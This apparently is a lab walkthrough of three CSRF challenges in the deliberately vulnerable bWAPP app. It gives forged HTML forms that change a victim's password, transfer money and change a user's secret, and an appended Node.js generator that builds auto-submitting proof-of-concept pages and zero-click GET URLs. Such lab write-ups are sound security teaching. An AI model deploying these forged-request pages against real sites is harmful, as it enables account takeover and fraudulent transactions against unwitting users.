Thursday, February 13, 2020

bWAPP CSRF

CSRF (Change Password)

The first challenge is the change-password CSRF. The goal is to change the user's password without the attacker's page ever logging in: the forged request rides on the session cookie the victim's browser already holds, and csrf_1.php does not require any per-request token that an outside page could not guess.

<html>
<body>
<!-- No method attribute, so the browser sends a GET request, which is what csrf_1.php accepts. -->
<form action="http://192.168.56.101/bWAPP/csrf_1.php">
<!-- Hidden fields carry the same parameter names as the real change-password form. -->
<input type="hidden" name="password_new" value="abc" />
<input type="hidden" name="password_conf" value="abc" />
<input type="hidden" name="action" value="change" />
<!-- The victim's browser attaches the bWAPP session cookie to the request automatically. -->
<input type="submit" value="Submit Request" />
</form>
</body>
</html>

First we create a special page with every parameter the real form would send filled in as a hidden field, plus a submit button. All that's left to do is open the page in the browser that holds the victim's bWAPP session, click the submit button, and check the response.

As you can see, the page we created changed the password, with no credentials of its own, purely through the CSRF vulnerability.

CSRF (Transfer Amount)

Next up is the transfer-amount CSRF. This page sends money to an account number, with the amount given as a second parameter. If we set those parameters ourselves and push our own request to the server, the transfer should go through just as if the user had filled in the form.

<html>
<body>
<!-- csrf_2.php takes its parameters from the query string, so the method is GET. -->
<form action="http://192.168.56.101/bWAPP/csrf_2.php" method="GET">
<input type="hidden" name="account" value="123-45678-90" />
<input type="hidden" name="amount" value="100" />
<input type="hidden" name="action" value="transfer" />
<!-- A named submit button is itself sent as a parameter (submit=Submit+Request). -->
<input type="submit" name="submit" value="Submit Request" />
</form>
</body>
</html>

We have the page set up. Now all that's left to do is submit the request and check the balance afterwards.

As you can see, the request went through: there are now 800 euros left in the account instead of the 900 that were there before the forged transfer.

CSRF (Change Secret)

This one is a change-secret CSRF. As before, we construct a page with all our parameters and a submit button, but this endpoint reads its parameters from the POST body, so the form must use method="POST".

<html>
<body>
<!-- csrf_3.php reads its parameters from the POST body, so a GET form would not work here. -->
<form action="http://192.168.56.101/bWAPP/csrf_3.php" method="POST">
<input type="hidden" name="secret" value="1234" />
<!-- The login field names the account whose secret is changed. -->
<input type="hidden" name="login" value="xyz" />
<input type="hidden" name="action" value="change" />
<input type="submit" value="Submit Request" />
</form>
</body>
</html>

We have our page set up. Let's submit the request and see what we get on the other end.

As you can see, we successfully changed the user's secret.
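All three challenges above are the same technique: reproduce the parameters of a state-changing request in a page the victim's browser will submit on our behalf. The hand-written forms need a click; a real attacker page submits itself. The following Node.js generator, an added example and not code from the original post, builds such auto-submitting proof-of-concept pages for the change-password, transfer-amount and change-secret endpoints, and also emits the bare URL for the two GET endpoints, which can be triggered by a link or an <img> tag with no form at all. The host 192.168.56.101, the csrf_1/2/3.php paths and the parameter names come from the post; escapeAttr, buildGetUrl, buildCsrfPoc and the challenges table are this example's own names.

```javascript
// Added example (not code from the original post): a generator for auto-submitting
// CSRF proof-of-concept pages covering the three bWAPP forms above. The host
// 192.168.56.101, the csrf_1/2/3.php paths and the parameter names come from the
// post; escapeAttr, buildGetUrl, buildCsrfPoc and the auto-submit are this example's own.

// Escape text for use inside a double-quoted HTML attribute, so a parameter value
// containing quotes or angle brackets cannot break out of the generated markup.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// For GET endpoints (csrf_1.php, csrf_2.php) the whole request fits in a URL. That
// URL can be triggered with no form at all: a link, an <img src>, or a redirect.
function buildGetUrl(action, fields) {
  const query = Object.entries(fields)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join("&");
  return query ? `${action}?${query}` : action;
}

// Build a PoC page whose form submits itself as soon as it loads. The "Submit Request"
// button in the hand-written forms exists only so the walkthrough can click it; an
// attacker page submits from script so the victim does nothing but open it.
function buildCsrfPoc({ action, method = "GET", fields = {} }) {
  const m = String(method).toUpperCase();
  if (m !== "GET" && m !== "POST") {
    // A plain HTML form can only send GET or POST; other verbs need fetch/XHR and CORS.
    throw new Error(`unsupported form method: ${method}`);
  }
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `  <input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}" />`)
    .join("\n");
  return [
    "<html>",
    "<body>",
    `<form id="csrf" action="${escapeAttr(action)}" method="${m}">`,
    inputs,
    "</form>",
    "<script>document.getElementById(\"csrf\").submit();</script>",
    "</body>",
    "</html>",
  ].join("\n");
}

// The three challenges from the post as PoC definitions.
const BWAPP = "http://192.168.56.101/bWAPP";
const challenges = {
  changePassword: {
    action: `${BWAPP}/csrf_1.php`, method: "GET",
    fields: { password_new: "abc", password_conf: "abc", action: "change" },
  },
  transferAmount: {
    action: `${BWAPP}/csrf_2.php`, method: "GET",
    // The post's form also named its submit button, so the real request carried a
    // submit parameter; keep it so the forged request sends the same parameters.
    fields: { account: "123-45678-90", amount: "100", action: "transfer", submit: "Submit Request" },
  },
  changeSecret: {
    action: `${BWAPP}/csrf_3.php`, method: "POST",
    fields: { secret: "1234", login: "xyz", action: "change" },
  },
};

// Print each PoC (and, for the GET ones, the bare URL) so it can be saved as an .html file.
for (const [name, cfg] of Object.entries(challenges)) {
  console.log(`--- ${name} ---`);
  if (cfg.method === "GET") console.log(`URL: ${buildGetUrl(cfg.action, cfg.fields)}`);
  console.log(buildCsrfPoc(cfg), "\n");
}
```

Save the printed markup as an .html file and open it in the browser that holds the bWAPP session; the form fires without a click. One caveat when reproducing this today: browsers that default cookies to SameSite=Lax still send the session cookie on the top-level GET navigations used by csrf_1.php and csrf_2.php, but generally withhold it on a cross-site POST like csrf_3.php unless the server explicitly sets SameSite=None, so the POST variant may need an older browser or a relaxed cookie policy in the lab.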
